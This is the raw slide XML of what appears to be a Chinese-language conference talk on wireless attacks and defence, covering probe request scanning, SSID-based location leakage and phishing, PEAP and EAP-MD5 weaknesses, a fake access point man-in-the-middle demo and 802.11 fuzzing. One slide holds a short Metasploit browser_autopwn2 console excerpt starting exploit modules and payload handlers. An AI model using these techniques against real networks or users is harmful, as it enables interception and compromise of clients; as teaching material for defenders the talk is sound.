                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的扫描。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="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1985" y="4098925"/>
            <a:ext cx="3677920" cy="238188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319905" y="6174105"/>
            <a:ext cx="19786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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>携带</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的主动扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="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5950" y="3739515"/>
            <a:ext cx="7706995" cy="243459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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ProbeRequest Frame</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="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6850" y="1567180"/>
            <a:ext cx="2047875" cy="16002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1275" y="5513070"/>
            <a:ext cx="515493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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>客户端发送Null(空)ssid信息的Probe reequest请求）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>客户端发送不携带SSID信息的广播ProbeRequest帧（SSID为空，也就是SSID IE的长度为0)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="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9345" y="1471930"/>
            <a:ext cx="8775065" cy="391414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5504815" y="6082665"/>
            <a:ext cx="32035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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不携带</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的主动扫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ProbeRequest Frame</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1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20700" y="1507490"/>
            <a:ext cx="433260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ProbeRequest SSID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>暴露的位置信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>定位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="105271677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0970" y="2007870"/>
            <a:ext cx="10353040" cy="2022475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="264409588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3490" y="269875"/>
            <a:ext cx="1809750" cy="180975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07670" y="4180840"/>
            <a:ext cx="36976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ProbeRequest SSID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>钓鱼</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="323697104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970" y="4549140"/>
            <a:ext cx="4827905" cy="2300605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="276048615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8875" y="4100195"/>
            <a:ext cx="6195060" cy="274955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1932940" y="453390"/>
            <a:ext cx="606679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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WPA-Radius</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>企业无线攻防</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="143607868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335" y="4268470"/>
            <a:ext cx="7802245" cy="214312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46405" y="1593850"/>
            <a:ext cx="6650990" cy="2584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 EAP-TTLS&amp;&amp;PEAP：这两个可以放在一起说，就像是WPA/WPA2 相似度很高。它们也要证书，不过是要Server端的而不是Client的。这两个相比，还是peap从各个方面来说方便，而且兼容好。所以企业一般都是PEAP。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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EAP需要进行保护，EAP协商就在安全隧道（TLS）内部来做，保证所有通信的数据安全性。那么它在内部也会选择一些认证来：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>【EAP-MS-CHAPv2】【EAP-GTC】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>它们是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PEAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>允许的子类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>与域账号结合。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="327997094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0350" y="356235"/>
            <a:ext cx="3969385" cy="3544570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="4152732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0680" y="5226050"/>
            <a:ext cx="7971790" cy="149288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1922780" y="453390"/>
            <a:ext cx="604837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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WPA-Radius</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>企业无线攻防</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="379511575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955" y="1491615"/>
            <a:ext cx="6164580" cy="2552065"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="psb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7005" y="1491615"/>
            <a:ext cx="3083560" cy="4104640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="psb (1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3815" y="2835275"/>
            <a:ext cx="3044825" cy="373570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80010" y="4518660"/>
            <a:ext cx="43910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https://github.com/WJDigby/apd_launchpad</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1862455" y="454660"/>
            <a:ext cx="672719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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WPA-Radius</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>企业无线攻防</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000">
              <a:solidFill>
                <a:schemeClr val="bg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42315" y="1565275"/>
            <a:ext cx="61880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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EAP-MD5:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据不受ssl保护，只有个MD5，只提供了最低级加密，MD5hash能被字典破掉，而且不支持密钥生成。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="5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3555" y="3080385"/>
            <a:ext cx="4620260" cy="2743835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="56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3060" y="2750820"/>
            <a:ext cx="5382260" cy="1114425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="timg (1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0535" y="3865245"/>
            <a:ext cx="3048635" cy="286575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框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1987550" y="368300"/>
            <a:ext cx="513588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000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>802.11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>客户端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000">
              <a:solidFill>
                <a:schemeClr val="bg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10540" y="1593850"/>
            <a:ext cx="274193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内网攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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欺骗中间人</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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已知</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>未知漏洞攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.....</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="1049983-20170504000200867-84284986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535" y="3061970"/>
            <a:ext cx="6246495" cy="258635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7084695" y="1816100"/>
            <a:ext cx="4845685" cy="45231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msf auxiliary(browser_autopwn2) &gt; run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[*] Auxiliary module execution completed</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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[*] Searching BES exploits, please wait...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msf auxiliary(browser_autopwn2) &gt; [*] Starting exploit modules...</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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msf auxiliary(browser_autopwn2) &gt; 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[*] Starting listeners...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[*] Time spent: 9.462520245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[*] Starting the payload handler...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[*] Starting the payload handler...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[*] Starting the payload handler...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[*] Starting the payload handler...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[*] Using URL: http://0.0.0.0:8080/welcome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[*] Local IP: http://192.168.1.108:8080/welcome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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fake AP MITM DEMO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" b="1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997710" y="2144395"/>
            <a:ext cx="672782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5400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            DEMO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" alt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星, 户外艺术系列&#10;&#10;已生成高可信度的说明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376484" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3714016" y="2228840"/>
            <a:ext cx="5283835" cy="1891030"/>
            <a:chOff x="3581400" y="2258020"/>
            <a:chExt cx="5827758" cy="2085695"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="文本框 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4709886" y="2258020"/>
              <a:ext cx="2772228" cy="10169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5400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Part 03</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" b="1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4" name="文本框 25"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3765597" y="3156592"/>
              <a:ext cx="5643561" cy="11871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3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>针对无线设备的漏洞挖掘</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1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5" name="文本框 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3581400" y="3755122"/>
              <a:ext cx="5029200" cy="3718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60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0">
        <p15:prstTrans prst="fallOver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1922780" y="481965"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>802.11-Fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" b="1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74370" y="1564640"/>
            <a:ext cx="653542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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fuzzing(模糊测试)是一种识别软件设计缺陷和安全漏洞的方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。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寻找漏洞方法：通过向目标发送畸形数据，试图使目标崩溃。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="AFL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0225" y="2484120"/>
            <a:ext cx="5339715" cy="3317875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="TIM截图2018081218365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7320" y="4081145"/>
            <a:ext cx="5380355" cy="224472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4" name="副标题 13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8" name="图片 17" descr="图片包含 星, 户外艺术系列&#10;&#10;已生成高可信度的说明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2075" y="-2540"/>
            <a:ext cx="12376484" cy="6858000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1349375" y="1704975"/>
            <a:ext cx="9896475" cy="2488565"/>
            <a:chOff x="1928960" y="1278169"/>
            <a:chExt cx="8399780" cy="3140271"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="文本框 23"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4729345" y="1278169"/>
              <a:ext cx="2733309" cy="13581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3200" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:sym typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>目录</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:sym typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr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3200" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:sym typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Contents</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:sym typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="文本框 48"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2028130" y="3837502"/>
              <a:ext cx="4457785" cy="5809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1218565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600" algn="l" defTabSz="1218565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9200" algn="l" defTabSz="1218565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800" algn="l" defTabSz="1218565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8400" algn="l" defTabSz="1218565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8000" algn="l" defTabSz="1218565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7600" algn="l" defTabSz="1218565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7200" algn="l" defTabSz="1218565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6800" algn="l" defTabSz="1218565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2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>3.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>针对无线设备的漏洞挖掘</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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1" name="文本框 48"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1928960" y="3136369"/>
              <a:ext cx="2743874" cy="5809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1218565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600" algn="l" defTabSz="1218565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9200" algn="l" defTabSz="1218565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800" algn="l" defTabSz="1218565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8400" algn="l" defTabSz="1218565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8000" algn="l" defTabSz="1218565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7600" algn="l" defTabSz="1218565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7200" algn="l" defTabSz="1218565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6800" algn="l" defTabSz="1218565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 altLang="zh-CN" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>1.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>常见的无线攻击威胁</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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3" name="文本框 48"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6363031" y="3837502"/>
              <a:ext cx="3965709" cy="5809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1218565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600" algn="l" defTabSz="1218565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9200" algn="l" defTabSz="1218565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800" algn="l" defTabSz="1218565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8400" algn="l" defTabSz="1218565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8000" algn="l" defTabSz="1218565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7600" algn="l" defTabSz="1218565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7200" algn="l" defTabSz="1218565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6800" algn="l" defTabSz="1218565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2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>4.无线攻击的识别与</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>防御</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>策略 </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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5" name="文本框 48"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6266017" y="3198069"/>
              <a:ext cx="2267429" cy="5809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1218565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600" algn="l" defTabSz="1218565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9200" algn="l" defTabSz="1218565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800" algn="l" defTabSz="1218565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8400" algn="l" defTabSz="1218565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8000" algn="l" defTabSz="1218565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7600" algn="l" defTabSz="1218565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7200" algn="l" defTabSz="1218565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6800" algn="l" defTabSz="1218565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 altLang="zh-CN" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
